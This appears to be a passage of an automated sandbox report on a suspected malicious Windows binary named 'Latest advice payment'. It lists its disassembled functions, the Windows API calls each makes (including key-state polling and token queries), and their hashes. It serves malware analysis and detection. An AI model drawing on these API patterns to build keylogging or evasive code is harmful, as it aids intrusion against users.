                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f74a8613cd31ab9a04f5bd7f2e8672e6c8661683dfbd2cd350ce83eac33b7261
                                                            • Instruction ID: 3982dface34fdfa1a0074e4c80630596e16552bdd8dc57080a4572848a65e3d0
                                                            • Opcode Fuzzy Hash: f74a8613cd31ab9a04f5bd7f2e8672e6c8661683dfbd2cd350ce83eac33b7261
                                                            • Instruction Fuzzy Hash: CB41E035904294ABCB2CDF39CC88FA9BFA5FB09310F144165F896A72E1CB70BD41DA51
                                                            Function 00562344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCursorPos.USER32(?), ref: 00562357
                                                            • ScreenToClient.USER32(006257B0,?), ref: 00562374
                                                            • GetAsyncKeyState.USER32(00000001), ref: 00562399
                                                            • GetAsyncKeyState.USER32(00000002), ref: 005623A7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: AsyncState$ClientCursorScreen
                                                            • String ID:
                                                            • API String ID: 4210589936-0
                                                            • Opcode ID: 26340fe52e86fb7a1d64ab662d6c395479786df32cb95858f21b7f32dd916d65
                                                            • Instruction ID: 495d026effb74219f9c7eaf9b10a084adb2149dd257ea03e58a5520ac167b880
                                                            • Opcode Fuzzy Hash: 26340fe52e86fb7a1d64ab662d6c395479786df32cb95858f21b7f32dd916d65
                                                            • Instruction Fuzzy Hash: 4B41B135A04606FBDF198F68C848AEDBF74FB55360F20475AF868972A0DB309954DF90
                                                            Function 005B63AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005B63E7
                                                            • TranslateAcceleratorW.USER32(?,?,?), ref: 005B6433
                                                            • TranslateMessage.USER32(?), ref: 005B645C
                                                            • DispatchMessageW.USER32(?), ref: 005B6466
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005B6475
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                            • String ID:
                                                            • API String ID: 2108273632-0
                                                            • Opcode ID: 3a2ab1c1d257bed376845297d4c3081a8b2c4eacf586061bfe4d423ffa2834c1
                                                            • Instruction ID: 021e350ae708ec14de9641b834a64f2a4cabcaae1c0e905fc9404cfd327b0462
                                                            • Opcode Fuzzy Hash: 3a2ab1c1d257bed376845297d4c3081a8b2c4eacf586061bfe4d423ffa2834c1
                                                            • Instruction Fuzzy Hash: 3431D231900E52AFDF348FB08C88BF67FA9BB01310F140575E426C70A0EB39A989DB61
                                                            Function 005B8A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowRect.USER32(?,?), ref: 005B8A30
                                                            • PostMessageW.USER32(?,00000201,00000001), ref: 005B8ADA
                                                            • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 005B8AE2
                                                            • PostMessageW.USER32(?,00000202,00000000), ref: 005B8AF0
                                                            • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 005B8AF8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: MessagePostSleep$RectWindow
                                                            • String ID:
                                                            • API String ID: 3382505437-0
                                                            • Opcode ID: 0df24594d5c5fd39ceafe9c5550c4f263e4592ad6a84b615836cbc1010e1af7c
                                                            • Instruction ID: a7c57c8b0d4190ce2fe12c6e268d71b2094af573885dd9f67e7a509bc39656dd
                                                            • Opcode Fuzzy Hash: 0df24594d5c5fd39ceafe9c5550c4f263e4592ad6a84b615836cbc1010e1af7c
                                                            • Instruction Fuzzy Hash: DF31D171500219EBDF14CF68D98DAEE3BB9FB04325F108229F924EA1D0CBB0A914DB90
                                                            Function 005BB1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • IsWindowVisible.USER32(?), ref: 005BB204
                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 005BB221
                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 005BB259
                                                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 005BB27F
                                                            • _wcsstr.LIBCMT ref: 005BB289
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                            • String ID:
                                                            • API String ID: 3902887630-0
                                                            • Opcode ID: 2d549219311d145127a77c7ea4ae97a4a56f2f822bee943f73e928aaf2ee36c3
                                                            • Instruction ID: a3ae52331d61e937066c083d046d433546eab9f2611edc98816b050edba810b6
                                                            • Opcode Fuzzy Hash: 2d549219311d145127a77c7ea4ae97a4a56f2f822bee943f73e928aaf2ee36c3
                                                            • Instruction Fuzzy Hash: C821D3762042416BFB256B799C49ABFBF98EF89710F004139FC04DA1A1EFE1AC409360
                                                            Function 005EB14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00562612: GetWindowLongW.USER32(?,000000EB), ref: 00562623
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 005EB192
                                                            • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 005EB1B7
                                                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 005EB1CF
                                                            • GetSystemMetrics.USER32(00000004), ref: 005EB1F8
                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,005D0E90,00000000), ref: 005EB216
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Window$Long$MetricsSystem
                                                            • String ID:
                                                            • API String ID: 2294984445-0
                                                            • Opcode ID: ed72f8d201978c25d6e74808e30b6e663c4e0f5540f75a58297d6dae51da67a1
                                                            • Instruction ID: 18a012e36ecd3a69fd753e0ee6fb06225b1c82ee4ebf0bef3dbd0174d0fb9ef2
                                                            • Opcode Fuzzy Hash: ed72f8d201978c25d6e74808e30b6e663c4e0f5540f75a58297d6dae51da67a1
                                                            • Instruction Fuzzy Hash: DC2171715106A1AFDB289F399C44A6B3BA4FB15332F104A25A9B2D71E0E7309811DB90
                                                            Function 005B9307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 005B9320
                                                              • Part of subcall function 00567BCC: _memmove.LIBCMT ref: 00567C06
                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 005B9352
                                                            • __itow.LIBCMT ref: 005B936A
                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 005B9392
                                                            • __itow.LIBCMT ref: 005B93A3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$__itow$_memmove
                                                            • String ID:
                                                            • API String ID: 2983881199-0
                                                            • Opcode ID: ccfad2285ca354e326f4ba1a3502de8bc15add97b2efead9395a3cccd1a59ad9
                                                            • Instruction ID: c65fcf7efd90a62848a7977a7229637ea2a2caf7749e7f153d5af9c6300becbf
                                                            • Opcode Fuzzy Hash: ccfad2285ca354e326f4ba1a3502de8bc15add97b2efead9395a3cccd1a59ad9
                                                            • Instruction Fuzzy Hash: 6421D031700209BBDB10AA649CCAEEE3FA9FF88710F044425FA44EB291DAB09D459791
                                                            Function 005D5A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • IsWindow.USER32(00000000), ref: 005D5A6E
                                                            • GetForegroundWindow.USER32 ref: 005D5A85
                                                            • GetDC.USER32(00000000), ref: 005D5AC1
                                                            • GetPixel.GDI32(00000000,?,00000003), ref: 005D5ACD
                                                            • ReleaseDC.USER32(00000000,00000003), ref: 005D5B08
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Window$ForegroundPixelRelease
                                                            • String ID:
                                                            • API String ID: 4156661090-0
                                                            • Opcode ID: 4693763e9a7247d4f78227b881c2f606e6d9a960debdee72119da1b798009191
                                                            • Instruction ID: 5022d96700e466affdd41d17bf3748f0fab1141733ea4b866ac60e42d8ecca67
                                                            • Opcode Fuzzy Hash: 4693763e9a7247d4f78227b881c2f606e6d9a960debdee72119da1b798009191
                                                            • Instruction Fuzzy Hash: B421A775A00114AFD714DF68DC88A59BFE5FF98310F148479F84597361DE30AD04DB90
                                                            Function 005612F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0056134D
                                                            • SelectObject.GDI32(?,00000000), ref: 0056135C
                                                            • BeginPath.GDI32(?), ref: 00561373
                                                            • SelectObject.GDI32(?,00000000), ref: 0056139C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ObjectSelect$BeginCreatePath
                                                            • String ID:
                                                            • API String ID: 3225163088-0
                                                            • Opcode ID: b687e44e9b68cfa15480d7cff88c5e11b2508fb5ca9c1e55c6a1fd7d2d500456
                                                            • Instruction ID: cfa5548a7e950aa42490eb514c5cca96ef3c851f22d9cf2acd998623e445a3f5
                                                            • Opcode Fuzzy Hash: b687e44e9b68cfa15480d7cff88c5e11b2508fb5ca9c1e55c6a1fd7d2d500456
                                                            • Instruction Fuzzy Hash: 16218130A00F19DBDB308F25DD487793FA9FB10321F184615E4129B2B0D7B49996DF54
                                                            Function 005C4A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 005C4ABA
                                                            • __beginthreadex.LIBCMT ref: 005C4AD8
                                                            • MessageBoxW.USER32(?,?,?,?), ref: 005C4AED
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 005C4B03
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 005C4B0A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                            • String ID:
                                                            • API String ID: 3824534824-0
                                                            • Opcode ID: efc05ddb5cc0e9a007004e43ece06405f16d8d3357336ef88026afae3231c800
                                                            • Instruction ID: 2f2368e017d5311c97f8dc2cc5b11b827bad1de77200475eff8a7d3177cce2f0
                                                            • Opcode Fuzzy Hash: efc05ddb5cc0e9a007004e43ece06405f16d8d3357336ef88026afae3231c800
                                                            • Instruction Fuzzy Hash: 8C110476905648BFCB259FA8EC48F9B7FADFB45320F144269F815D3290DA71CE048BA0
                                                            Function 005B8202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 005B821E
                                                            • GetLastError.KERNEL32(?,005B7CE2,?,?,?), ref: 005B8228
                                                            • GetProcessHeap.KERNEL32(00000008,?,?,005B7CE2,?,?,?), ref: 005B8237
                                                            • HeapAlloc.KERNEL32(00000000,?,005B7CE2,?,?,?), ref: 005B823E
                                                            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 005B8255
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 842720411-0
                                                            • Opcode ID: e12c8d25d12065789d61446eb6f27b28ec8179e8a4976c3f54f649dd1b1f3df3
                                                            • Instruction ID: 0eccfae84cd7a1ff38468aef6bd854050d95ea8003742c9176b1facb47f3031d
                                                            • Opcode Fuzzy Hash: e12c8d25d12065789d61446eb6f27b28ec8179e8a4976c3f54f649dd1b1f3df3
                                                            • Instruction Fuzzy Hash: 52016D75200249BFDB244FA5DC88DAB7FADFF9A754B504429F849C6260DE319C04DB60
                                                            Function 005B710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,005B7044,80070057,?,?,?,005B7455), ref: 005B7127
                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,005B7044,80070057,?,?), ref: 005B7142
                                                            • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,005B7044,80070057,?,?), ref: 005B7150
                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,005B7044,80070057,?), ref: 005B7160
                                                            • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,005B7044,80070057,?,?), ref: 005B716C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                            • String ID:
                                                            • API String ID: 3897988419-0
                                                            • Opcode ID: fae22f5b3fe642653c18e57f3502c2cdeedd4e60fd9bfefec1a4850b62daf6a1
                                                            • Instruction ID: 957d23fafff2e3f2d0b3dc7e54ff1e8a2f19e45305ae1b96a58a7a0e6c105050
                                                            • Opcode Fuzzy Hash: fae22f5b3fe642653c18e57f3502c2cdeedd4e60fd9bfefec1a4850b62daf6a1
                                                            • Instruction Fuzzy Hash: AB0171B2605208ABDB154F68DC84AAA7FADFB88751F144064FD44D6210DB31ED40E7A0
                                                            Function 005C5244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 005C5260
                                                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 005C526E
                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 005C5276
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 005C5280
                                                            • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 005C52BC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                            • String ID:
                                                            • API String ID: 2833360925-0
                                                            • Opcode ID: 5c135d5f48288fc59ddf28b2cb0ea9ae4b54f5af9f409a56ad25e30ddcbc5280
                                                            • Instruction ID: d04d2334db55db57f80ce2441b33c8e00712e1213cf00747855774ed5fbc83d0
                                                            • Opcode Fuzzy Hash: 5c135d5f48288fc59ddf28b2cb0ea9ae4b54f5af9f409a56ad25e30ddcbc5280
                                                            • Instruction Fuzzy Hash: 53015B35D01A1DDBDF04DFE4E888AEDBBB8BB59311F400459E981B6140DF706594D7A1
                                                            Function 005B810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 005B8121
                                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 005B812B
                                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 005B813A
                                                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 005B8141
                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 005B8157
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 44706859-0
                                                            • Opcode ID: 7beeae12e11cb9264086af367376cc27f3f6e44d19b75579486d53b996ab16f0
                                                            • Instruction ID: fdd5ed9961cb12f2814b36df6aef742b85476cde2d0572b246dbc62272416860
                                                            • Opcode Fuzzy Hash: 7beeae12e11cb9264086af367376cc27f3f6e44d19b75579486d53b996ab16f0
                                                            • Instruction Fuzzy Hash: 09F03171201344AFD7150F65DCC8EB73BACFF89654B000025F58596150CE619945EB60
                                                            Function 005BC1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDlgItem.USER32(?,000003E9), ref: 005BC1F7
                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 005BC20E
                                                            • MessageBeep.USER32(00000000), ref: 005BC226
                                                            • KillTimer.USER32(?,0000040A), ref: 005BC242
                                                            • EndDialog.USER32(?,00000001), ref: 005BC25C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                            • String ID:
                                                            • API String ID: 3741023627-0
                                                            • Opcode ID: bea9014d1075337bdbdc3fbcda7f48da452782de2a744f72da35bb078aa1af24
                                                            • Instruction ID: 945ee8821ff22b8d785e04a175b82fcc2a6ef7c80e2529473975ba5c76f13c77
                                                            • Opcode Fuzzy Hash: bea9014d1075337bdbdc3fbcda7f48da452782de2a744f72da35bb078aa1af24
                                                            • Instruction Fuzzy Hash: 0201A234404304ABEB245B60ED8EB96BFB8FB10B06F000669A5C2A54E0DBF079489B94
                                                            Function 005613B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EndPath.GDI32(?), ref: 005613BF
                                                            • StrokeAndFillPath.GDI32(?,?,0059B888,00000000,?), ref: 005613DB
                                                            • SelectObject.GDI32(?,00000000), ref: 005613EE
                                                            • DeleteObject.GDI32 ref: 00561401
                                                            • StrokePath.GDI32(?), ref: 0056141C
                                                            Memory Dump Source
